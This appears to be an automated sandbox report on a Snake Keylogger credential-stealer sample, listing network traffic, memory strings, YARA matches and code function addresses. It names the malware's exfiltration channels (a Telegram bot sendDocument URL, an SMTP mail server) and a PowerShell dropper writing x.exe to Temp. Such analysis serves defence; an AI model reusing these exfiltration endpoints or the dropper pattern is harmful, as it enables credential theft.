Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp 05EBD4E0h	5_2_05EBD238

Source: global traffic

TCP traffic: 192.168.2.6:49762 -> 123.30.244.30:587

Source: global traffic

HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 132.226.8.169 132.226.8.169
Source: Joe Sandbox View	IP Address: 104.21.16.1 104.21.16.1

Source: Joe Sandbox View

ASN Name: VNPT-AS-VNVietnamPostsandTelecommunicationsVNPTVN VNPT-AS-VNVietnamPostsandTelecommunicationsVNPTVN

Source: Joe Sandbox View

JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic

Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49712 -> 132.226.8.169:80

Source: global traffic

TCP traffic: 192.168.2.6:49762 -> 123.30.244.30:587

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org

Source: unknown

HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.6:49723 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org

Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: mail.phobinh.com.vn

Source: RegAsm.exe, 00000005.00000002.3418127650.0000000002960000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.com
Source: RegAsm.exe, 00000005.00000002.3418127650.0000000002960000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.comd
Source: RegAsm.exe, 00000005.00000002.3418127650.0000000002960000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.3418127650.000000000294E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.3418127650.0000000002A36000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: RegAsm.exe, 00000005.00000002.3418127650.00000000028E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: RegAsm.exe, 00000005.00000002.3418127650.0000000002960000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.3418127650.0000000002A36000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/d
Source: x.exe, 00000004.00000002.2228950567.0000000004244000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.3414537023.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: RegAsm.exe, 00000005.00000002.3418127650.0000000002960000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.orgd
Source: RegAsm.exe, 00000005.00000002.3421733892.0000000005CA2000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.3418127650.0000000002A36000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.3415809274.0000000000CCF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: RegAsm.exe, 00000005.00000002.3421733892.0000000005CA2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: powershell.exe, 00000000.00000002.2251667720.0000023CD090B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.m
Source: RegAsm.exe, 00000005.00000002.3421733892.0000000005CA2000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.3418127650.0000000002A36000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.3415809274.0000000000CCF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.3421733892.0000000005C60000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#
Source: RegAsm.exe, 00000005.00000002.3418127650.0000000002A36000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mail.phobinh.com.vn
Source: RegAsm.exe, 00000005.00000002.3418127650.0000000002A36000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mail.phobinh.com.vnd
Source: RegAsm.exe, 00000005.00000002.3418127650.0000000002A36000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mail24430.maychuemail.com
Source: RegAsm.exe, 00000005.00000002.3418127650.0000000002A36000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mail24430.maychuemail.comd
Source: powershell.exe, 00000000.00000002.2218404373.0000023CB9FE4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2240464969.0000023CC8743000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2240464969.0000023CC84D9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: RegAsm.exe, 00000005.00000002.3421733892.0000000005CA2000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.3418127650.0000000002A36000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.3415809274.0000000000CCF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: RegAsm.exe, 00000005.00000002.3421733892.0000000005CA2000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.3418127650.0000000002A36000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.3415809274.0000000000CCF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.3421733892.0000000005C60000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.sectigo.com0-
Source: powershell.exe, 00000000.00000002.2218404373.0000023CB9F88000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: RegAsm.exe, 00000005.00000002.3418127650.000000000297D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://reallyfreegeoip.org
Source: RegAsm.exe, 00000005.00000002.3418127650.000000000297D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://reallyfreegeoip.orgd
Source: powershell.exe, 00000000.00000002.2218404373.0000023CB8461000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.3418127650.00000000028E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000000.00000002.2218404373.0000023CB9A6D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000000.00000002.2218404373.0000023CB9F88000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: RegAsm.exe, 00000005.00000002.3421733892.0000000005C60000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.
Source: powershell.exe, 00000000.00000002.2218404373.0000023CB8461000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: RegAsm.exe, 00000005.00000002.3418127650.0000000002A36000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: x.exe, 00000004.00000002.2228950567.0000000004244000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.3414537023.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot-/sendDocument?chat_id=
Source: powershell.exe, 00000000.00000002.2240464969.0000023CC84D9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000000.00000002.2240464969.0000023CC84D9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000000.00000002.2240464969.0000023CC84D9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000000.00000002.2218404373.0000023CB9F88000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000000.00000002.2218404373.0000023CB9FE4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2240464969.0000023CC8743000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2240464969.0000023CC84D9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000000.00000002.2218404373.0000023CB9A6D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneget.org
Source: powershell.exe, 00000000.00000002.2218404373.0000023CB9A6D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneget.orgX
Source: RegAsm.exe, 00000005.00000002.3418127650.0000000002960000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: x.exe, 00000004.00000002.2228950567.0000000004244000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.3418127650.0000000002960000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.3414537023.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: RegAsm.exe, 00000005.00000002.3418127650.0000000002960000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189d
Source: RegAsm.exe, 00000005.00000002.3418127650.0000000002960000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189l
Source: RegAsm.exe, 00000005.00000002.3421733892.0000000005CA2000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.3418127650.0000000002A36000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.3415809274.0000000000CCF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.3421733892.0000000005C60000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sectigo.com/CPS0

Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723

System Summary

Malicious sample detected (through community Yara rule)

Source: 4.2.x.exe.42e4aa0.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 4.2.x.exe.42e4aa0.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 4.2.x.exe.42b6e58.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 4.2.x.exe.42b6e58.2.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 4.2.x.exe.42cdc80.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 4.2.x.exe.42cdc80.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 5.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 5.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 4.2.x.exe.42e4aa0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 4.2.x.exe.42e4aa0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 4.2.x.exe.42cdc80.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 4.2.x.exe.42cdc80.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 4.2.x.exe.42b6e58.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 4.2.x.exe.42b6e58.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000005.00000002.3414537023.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000004.00000002.2228950567.0000000004244000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: powershell.exe PID: 5088, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: x.exe PID: 1428, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: RegAsm.exe PID: 1280, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown

PE file contains section with special chars

Source: x.exe.0.dr

Static PE information: section name: 6Fd:c#

PE file has nameless sections

Source: x.exe.0.dr

Static PE information: section name:

Powershell drops PE file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\x.exe

Jump to dropped file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FFD34630002	0_2_00007FFD34630002
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_00C228D0	4_2_00C228D0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_00C20848	4_2_00C20848
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_00C211E0	4_2_00C211E0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_00C228C1	4_2_00C228C1
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_00C207E0	4_2_00C207E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00F0C168	5_2_00F0C168
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00F0CAB0	5_2_00F0CAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00F07E68	5_2_00F07E68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00F04F08	5_2_00F04F08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00F0B9E0	5_2_00F0B9E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00F0B9D0	5_2_00F0B9D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00F0CAAF	5_2_00F0CAAF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00F02DD1	5_2_00F02DD1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00F04EF8	5_2_00F04EF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00F07E67	5_2_00F07E67
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_05EB15F8	5_2_05EB15F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_05EB4500	5_2_05EB4500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_05EB1C58	5_2_05EB1C58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_05EB7770	5_2_05EB7770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_05EB6998	5_2_05EB6998
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_05EB7198	5_2_05EB7198
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_05EB15EB	5_2_05EB15EB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_05EBCDE0	5_2_05EBCDE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_05EBCDD0	5_2_05EBCDD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_05EBED80	5_2_05EBED80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_05EBED70	5_2_05EBED70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_05EB0D48	5_2_05EB0D48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_05EBC520	5_2_05EBC520
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_05EB0D39	5_2_05EB0D39
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_05EBC530	5_2_05EBC530
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_05EBE4C0	5_2_05EBE4C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_05EBE4D0	5_2_05EBE4D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_05EB0489	5_2_05EB0489
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_05EBBC80	5_2_05EBBC80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_05EB0498	5_2_05EB0498
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_05EB9C90	5_2_05EB9C90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_05EBBC71	5_2_05EBBC71
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_05EB3C42	5_2_05EB3C42
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_05EB3C50	5_2_05EB3C50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_05EBDC20	5_2_05EBDC20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_05EB1C32	5_2_05EB1C32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_05EB1C36	5_2_05EB1C36
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_05EBDC11	5_2_05EBDC11
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_05EB37E8	5_2_05EB37E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_05EB37F8	5_2_05EB37F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_05EBAF68	5_2_05EBAF68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_05EBAF78	5_2_05EBAF78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_05EB2F48	5_2_05EB2F48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_05EB2F38	5_2_05EB2F38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_05EBA6C8	5_2_05EBA6C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_05EBA6B9	5_2_05EBA6B9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_05EBD681	5_2_05EBD681
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_05EBD690	5_2_05EBD690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_05EBF620	5_2_05EBF620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_05EBF630	5_2_05EBF630
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_05EB9E18	5_2_05EB9E18
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_05EBF1C8	5_2_05EBF1C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_05EBF1D8	5_2_05EBF1D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_05EB11A0	5_2_05EB11A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_05EBC988	5_2_05EBC988
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_05EB118F	5_2_05EB118F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_05EBC97A	5_2_05EBC97A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_05EBE928	5_2_05EBE928
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_05EBE91E	5_2_05EBE91E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_05EB08F0	5_2_05EB08F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_05EBC0CA	5_2_05EBC0CA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_05EBC0D8	5_2_05EBC0D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_05EB08DF	5_2_05EB08DF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_05EB40A8	5_2_05EB40A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_05EB4098	5_2_05EB4098
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_05EBE068	5_2_05EBE068
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_05EBE078	5_2_05EBE078
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_05EB0040	5_2_05EB0040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_05EBB828	5_2_05EBB828
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_05EB003B	5_2_05EB003B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_05EBB818	5_2_05EBB818
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_05EBB3C1	5_2_05EBB3C1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_05EBB3D0	5_2_05EBB3D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_05EB33A0	5_2_05EB33A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_05EB3391	5_2_05EB3391
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_05EBAB20	5_2_05EBAB20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_05EBAB10	5_2_05EBAB10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_05EB2AE0	5_2_05EB2AE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_05EB2AF0	5_2_05EB2AF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_05EBFA88	5_2_05EBFA88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_05EBA261	5_2_05EBA261
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_05EBFA78	5_2_05EBFA78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_05EBA270	5_2_05EBA270
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_05EBD22A	5_2_05EBD22A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_05EBD238	5_2_05EBD238

Source: 4.2.x.exe.42e4aa0.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 4.2.x.exe.42e4aa0.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.x.exe.42b6e58.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 4.2.x.exe.42b6e58.2.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.x.exe.42cdc80.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
